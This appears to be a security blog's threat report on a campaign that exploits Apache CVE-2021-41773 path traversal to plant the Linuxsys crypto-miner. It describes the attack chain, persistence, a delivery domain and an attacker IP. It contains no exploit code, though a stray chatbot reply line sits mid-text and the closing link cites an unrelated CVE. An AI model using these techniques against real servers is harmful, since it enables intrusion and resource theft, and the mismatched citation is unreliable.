Researchers have uncovered a spreading campaign that exploits a known Apache HTTP Server vulnerability (CVE‑2021‑41773) to deploy a Linux-based cryptocurrency miner called Linuxsys. This path-traversal flaw, affecting Apache 2.4.49, allows unauthenticated attackers to write and execute arbitrary code on vulnerable web servers. In recent weeks, compromised websites have begun silently delivering mining scripts via curl or wget downloads, sourced through compromised third-party infrastructure. The activity originates primarily from an Indonesian IP and strongly suggests a coordinated campaign leveraging stealthy distribution channels to monetize compromised assets.
The vulnerability at the heart of this campaign is CVE-2021-41773, a well-documented path traversal flaw in Apache HTTP Server version 2.4.49. Although this vulnerability was disclosed and patched back in 2021, threat actors are still actively targeting unpatched systems today exploiting servers that may have been overlooked or left behind in larger infrastructure deployments.
Here’s how the attack works in practice: Apache servers misconfigured with the mod_cgi module enabled are especially vulnerable. Attackers send crafted HTTP requests that include directory traversal sequences like ../../ in the URL path. These sequences allow them to escape the root web directory and access sensitive files or even execute arbitrary commands on the server through CGI scripts. If successful, they gain remote shell access without ever needing to authenticate.
In the latest wave of attacks, the attackers are using this access to run shell commands that silently download and execute malicious scripts. These scripts typically use tools like curl or wget to fetch additional payloads from remote servers often hosted on compromised but legitimate domains, such as repositorylinux.org. This strategy allows the attackers to maintain operational stealth, since traditional blocklists or threat intelligence platforms might not immediately flag these delivery sites.
The payload in question is a Linux-based cryptocurrency miner known as Linuxsys. Once executed, the miner runs in the background, hijacking CPU resources to mine for cryptocurrencies such as Monero. The mining process is usually disguised to look like a system process and is configured to consume only a moderate portion of system resources. This slow-burn approach helps it stay hidden for long periods without tripping usage alarms or drawing attention from users or administrators.
To ensure persistence, the malware modifies startup configurations and sometimes plants cron jobs that restart the miner if it is killed, or the server is rebooted. It can also make use of symlinks or deceptive file naming conventions to blend in with other system files. Some reports indicate that the malware may even remove forensic traces, like deleting bash history or log files, making detection and post-incident analysis more difficult.
Notably, one of the source IP addresses linked to these attacks 103.193.177[.]152, traced back to Indonesia has been actively scanning and exploiting vulnerable Apache installations across multiple continents. The campaign’s infrastructure is redundant and distributed, meaning even if one payload server is taken down, others quickly pick up the slack. This shows a level of planning and resiliency often associated with mature threat groups rather than opportunistic actors.
From a defensive standpoint, this vulnerability chain is a stark reminder of how easily overlooked misconfigurations or outdated software can be exploited in a highly automated fashion. Attackers are not only using an old CVE they are chaining it with modern malware distribution methods, giving them a quiet but profitable foothold in compromised environments.
Let me know if you’d like this tailored into a SOC alert format or integrated into a SIEM rule set.
This campaign turns compromised Apache web servers into clandestine crypto-mining machines, consuming CPU cycles and increasing operational costs. Over time, mining can degrade performance, leading to slow response times, increased power usage, and possible compliance violations if resource allocation breaches service level agreements. Additionally, the use of path traversal vulnerabilities for unauthorized command execution opens the door to far more severe outcomes, such as installation of backdoors, data theft, or ransomware deployment. The campaign represents an ongoing, stealthy threat that emphasizes monetization over immediate disruption.
https://ubuntu.com/security/CVE-2024-48887
